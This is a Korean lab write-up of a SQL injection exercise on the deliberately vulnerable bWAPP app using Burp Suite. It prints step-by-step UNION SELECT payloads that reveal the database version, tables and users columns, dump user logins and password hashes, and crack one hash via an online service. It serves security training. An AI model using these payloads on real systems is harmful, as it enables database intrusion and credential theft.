MISSON. 버프스위트를 이용해 사용자들의 id와 password를 획득하자.

 

hello를 입력해주고 버프 스위트를 확인해주었더니 title=hello&action=search라고 적힌 것을 볼 수 있었다.

 

Quest. 데이터베이스 정보를 알아내세요.
> Hint 1
DB버전을 확인하는 쿼리를 찾아보세요.

> Hint 2
@@vesion, database()으로 버전과 이름을 알 수 있습니다.
시스템 변수 및 함수 설명
database() DB 이름
user() 사용자 ID
system_user() 권리자 권한 사용자 ID
version() DB 서버의 버전
@@datadir DB 서버가 존재하는 경로

칼럼 번호에 맞춰  0' union select all 1,@@version,database(),4,5,6,7#를 입력해주면 결과가 다음과 같다.

버전은 5.0.96-0ubuntu3이고 DB의 이름은 bWAPP임을 알 수 있다.

 

 

Quest. 데이터베이스에 존재하는 모든 테이블 명을 출력하세요.
> Hint1
GET방식과 쿼리는 같습니다.

4번 줄에 넣어주어야 하므로 4번 자리에 table_name을 넣어주었다.

0' union select all 1,2,3,table_name,5,6,7 from information_schema.tables# 

 

Quest. 사용자 정보가 들어있는 칼럼을 출력하세요.

> Hint1
사용자 정보는 users테이블에 있습니다.

user 테이블을 이용하여

0' union select all 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#

를 입력해주었더니 다음과 같은 결과를 얻을 수 있었다.

 

Quest. 사용자의 id, password, secret, login 정보를 출력해봅시다.
> Hint1
https://crackstation.net/ 해시값을 크랙할 수 있는 사이트입니다.

> Hint2
password값으로 나온 해시값을 크랙해서 나온 결과를 첨부하면 됩니다.

0' union select all 1,id,login,email,password,6,7 from users# 를 입력해주어서 다음과 같은 결과를 얻을 수 있었다.

 

해시값을 크랙할 수 있는 사이트에 접속해 위에서 나온 해시값을 입력해주었다.

비밀번호는 bug 이다.

+ Recent posts